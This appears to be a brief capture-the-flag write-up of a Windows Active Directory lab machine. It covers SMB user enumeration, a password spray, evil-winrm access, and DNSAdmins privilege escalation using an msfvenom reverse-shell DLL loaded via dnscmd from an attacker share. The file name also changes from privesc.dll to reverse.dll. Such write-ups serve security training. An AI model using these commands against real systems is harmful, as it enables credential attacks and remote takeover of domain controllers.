NETWORK
ENUMERATION
User enumeration
Enum4linux has revealled few potential users
enum4linux -a -u '' -p '' 10.10.10.169
Doing a user enumeration with crackmapexec
crackmapexec smb megabank.local -u '' -p '' --users
We have found the user marko password
Password spray
A password brute force on the list of users against the password ‘Welcome123!’ reveals that it belong to user Melanie (somehow not the user Marko)
crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!' --continue-on-success
FOOTHOLD
Using the credentials found at the previous step, we are able to access to the machine using evil-winrm
PRIV ESCALATION
Findings
Looking into this file we have found the credentials for user Ryan
Abusing DNSAdmins privilege for escalation in Active Directory
Googling around the term DNSadmins, we have found https://medium.com/techzap/dns-admin-privesc-in-active-directory-ad-windows-ecc7ed5a21a2 which is basically creating a custom DLL which will then be run while restarting the DNS.
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.5 LPORT=4444 -f dll > privesc.dll
We can then use the reverse.dll with dnscmd command (calling our reverse.dll from a share started on kali)
dnscmd /config /serverlevelplugindll \\10.10.16.5\kali\reverse.dll